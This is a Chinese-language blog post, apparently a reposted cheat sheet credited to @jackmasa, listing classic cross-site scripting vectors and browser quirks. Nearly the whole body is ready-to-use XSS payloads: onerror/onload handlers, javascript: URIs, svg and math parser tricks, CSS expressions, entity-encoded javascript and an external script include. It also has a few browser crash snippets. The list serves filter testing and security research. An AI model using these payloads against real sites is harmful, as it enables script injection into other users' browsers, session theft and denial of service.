一些经典的XSS跨站代码整理

<!-- " --!><input value="><img src=xx:x οnerrοr=alert(1)//">

<script/οnlοad=alert(1)></script> IE9

<style/οnlοad=alert(1)>

alert([0x0D]-->[0x0D]1<!--[0x0D])

1<!--i

document.write('<img src="<iframe/οnlοad=alert(1)>\0">'); IE8

JSON.parse('{"__proto__":["a",1]}')

location++

IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)

alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog

<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera

Function('alert(arguments.callee.caller)')()

firefox dos? while(1)find();

<div/style=x:expression(alert(URL=1))>

Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode!

<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!

<math><script>sgl='<img/src=xx:x οnerrοr=alert(1)>'</script> chrome firefox opera vector

<svg><oooooo/oooooooooo/οnlοad=alert(1) > works on webkit~

<body/οnlοad=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>

vbs:alert+-[]

<body/οnlοad=vbs::::::::alert----+--+----1:::::::::>

Firefox vector <math><a xlink:href="//mmme.me">click

<svg><script>a='<svg/οnlοad=alert(1)></svg>';alert(2)</script>

Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss

[code]Webkit X-XSS-Protection header is enabled just now :P

<svg/οnlοad=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/

<?xml encoding="><svg/οnlοad=alert(1)// >">

<a "<img/src=xxx:x οnerrοr=alert(1) >x</a> Distinctive IE

Also <a `="<img/οnerrοr=alert(1) src=xx:xx>'></h1>">x</a>

<h1 "='<img/οnerrοr=alert(1) src=xx:xx>'></h1> IE only

<1h name="<svg/οnlοad=alert(1)>"></1h>

<img ="1 src=xxx:x οnerrοr=alert(1)//" > works in not-IE

javascript=1;for(javascript in RuntimeObject());javascript=='javascript'

<body/οnerrοr=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object

<img src='javascript:while([{}]);'> works in firefox

for(x in document.open); Crash your IE 6:>

localStorage.setItem('setItem',1)

Only to find '?'.toUpperCase()==='?'.toUpperCase()

J? H? T? W? Y? i? length==2

'?'.toUpperCase()=='I'

Also '?'.toUpperCase()=='SS'

'?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST

#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>

Firefox always the most cute data:_,<script>alert(1)</script>

<a href="ftp:/baidu.com">xx</a>

http://?????????? works in Firefox

RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?

location='&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'

for({} in {});

興味深いhttp://jsbin.com/inekab for Opera only

<a href=https:http://www.google.com>x</a> That's a relative path?

document.frames==window.frames

<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox

(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D

127.0x000000001==127.0.0.1

<input value="&#31sefewfewf"/> Chrome input value block

<svg><xmp><img/οnerrοr=alert(1) src=xxx:x />

<img src/="><img src=xxx:x οnerrοr=alert(1)//">

有趣的isindex <isindex formaction=javascript:alert(1) type=submit >

chrome:xx - >chrome://crash/ crash?

<form action=javascript:alert(1) /><input> Chrome input enter fucked!

<form/><button/><keygen/> chrome send empty key,is funny~_~

<form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code

[code]<form><input/name="isindex"> when name are isindex does not send key.

<form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support .

<script language="php">echo 1 ?> Fascinating.

fvck:for(_?in?this)_['match'](/.Element$/)&&console.log(_)

location.reload('javascript:alert(1)') //ie only,lol~

{}alert(1)

Twitter @jackmasa =P

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

源码市场

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值